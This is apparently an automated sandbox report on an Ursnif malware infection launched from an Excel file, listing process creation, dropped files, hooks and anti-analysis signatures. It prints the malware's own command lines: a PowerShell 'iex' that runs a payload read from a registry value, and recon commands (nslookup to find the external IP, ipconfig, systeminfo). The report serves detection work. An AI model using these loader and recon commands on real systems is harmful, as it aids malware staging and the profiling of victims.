Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 C:\fyjh\zglgy\lckhvmn.drhdh,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\fyjh\zglgy\lckhvmn.drhdh,DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2828 CREDAT:275457 /prefetch:2 Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2392 CREDAT:275457 /prefetch:2 Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1340 CREDAT:275457 /prefetch:2 Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2168 CREDAT:275457 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\47278A61-FA3B-119B-3C6B-CED530CFE2D9').apiMgcfg))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\8pjpp9kb.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vl8o3v8u.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES6C1D.tmp' 'c:\Users\user\AppData\Local\Temp\CSC6C1C.tmp'
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8BAE.tmp' 'c:\Users\user\AppData\Local\Temp\CSC8BAD.tmp'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\29B8.bi1'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\29B8.bi1'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'ipconfig /all >> C:\Users\user\AppData\Local\Temp\B55E.bin1'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'systeminfo.exe > C:\Users\user\AppData\Local\Temp\A8F1.bin1'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000004.00000003.2382947063.0000000004910000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000014.00000002.2415948225.0000000001FB0000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\47278A61-FA3B-119B-3C6B-CED530CFE2D9').apiMgcfg))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\47278A61-FA3B-119B-3C6B-CED530CFE2D9').apiMgcfg))
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\8pjpp9kb.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vl8o3v8u.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\8pjpp9kb.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vl8o3v8u.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234F304 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 4_2_0234F304
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003D3E60 push 003D3EEDh; ret 4_2_003D3EE5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00386040 push 0038606Ch; ret 4_2_00386064
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003960F0 push ecx; mov dword ptr [esp], edx 4_2_003960F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00396134 push ecx; mov dword ptr [esp], edx 4_2_00396139
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00394104 push 00394151h; ret 4_2_00394149
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00398174 push ecx; mov dword ptr [esp], ecx 4_2_00398179
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A8404 push 003A845Dh; ret 4_2_003A8455
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0039447C push 003944A8h; ret 4_2_003944A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0039C53C push ecx; mov dword ptr [esp], edx 4_2_0039C53E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003D860C push 003D863Fh; ret 4_2_003D8637
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A8A7C push 003A8ABFh; ret 4_2_003A8AB7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00386ABC push ecx; mov dword ptr [esp], eax 4_2_00386ABD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A8AF4 push 003A8B20h; ret 4_2_003A8B18
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A8B2C push 003A8B64h; ret 4_2_003A8B5C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0038CB64 push ecx; mov dword ptr [esp], edx 4_2_0038CB69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003D8B58 push 003D8B90h; ret 4_2_003D8B88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003BCB50 push 003BCB7Ch; ret 4_2_003BCB74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003D8B9C push 003D8BC8h; ret 4_2_003D8BC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003D8BD4 push 003D8C00h; ret 4_2_003D8BF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A8BC0 push 003A8BECh; ret 4_2_003A8BE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003AEC2C push ecx; mov dword ptr [esp], edx 4_2_003AEC30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003D8C0C push 003D8C32h; ret 4_2_003D8C2A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00386CA0 push 00386CCCh; ret 4_2_00386CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A8C90 push 003A8CC3h; ret 4_2_003A8CBB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A8CF0 push 003A8D1Ch; ret 4_2_003A8D14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A6CF4 push 003A6D32h; ret 4_2_003A6D2A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A6D3C push 003A6D68h; ret 4_2_003A6D60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003D4D10 push 003D4D8Dh; ret 4_2_003D4D85
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00382D00 push eax; ret 4_2_00382D3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A6D74 push 003A6DACh; ret 4_2_003A6DA4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A8D40 push 003A8D83h; ret 4_2_003A8D7B

Persistence and Installation Behavior:

barindex
Uses ipconfig to lookup or modify the Windows network settings
Source: unknown Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\fyjh\zglgy\lckhvmn.drhdh Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\yytr[1].png Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe File created: C:\Users\user\AppData\Local\Temp\vl8o3v8u.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe File created: C:\Users\user\AppData\Local\Temp\8pjpp9kb.dll Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\yytr[1].png Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\fyjh\zglgy\lckhvmn.drhdh Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.2321839049.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321796165.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321745663.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2455042419.0000000002936000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2380930371.00000000028D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2416709074.0000000002340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321730520.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321759010.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2378828561.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2416998966.0000000002890000.00000040.00000001.sdmp, type: MEMORY
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: kernel32.dll function: CreateProcessW address: 76F37000
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: kernel32.dll function: CreateProcessW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003B63F8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 4_2_003B63F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003CE8A4 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 4_2_003CE8A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003CF1C8 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 4_2_003CF1C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A5390 IsIconic,GetWindowPlacement,GetWindowRect, 4_2_003A5390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003B93D0 PostMessageA,PostMessageA,SendMessageA,70D9FFF6,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 4_2_003B93D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003B9AF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 4_2_003B9AF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003B9BA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 4_2_003B9BA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003CDFF0 IsIconic,GetCapture, 4_2_003CDFF0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003ADDB8 4_2_003ADDB8
Tries to delay execution (extensive OutputDebugStringW loop)
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Section loaded: OutputDebugStringW count: 168
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 4_2_003B8940
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\yytr[1].png Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vl8o3v8u.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8pjpp9kb.dll Jump to dropped file
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003ADDB8 4_2_003ADDB8
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 408 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2680 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\ipconfig.exe TID: 2236 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\ipconfig.exe TID: 2236 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003851E8 GetModuleHandleA,70D9FFF6,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 4_2_003851E8
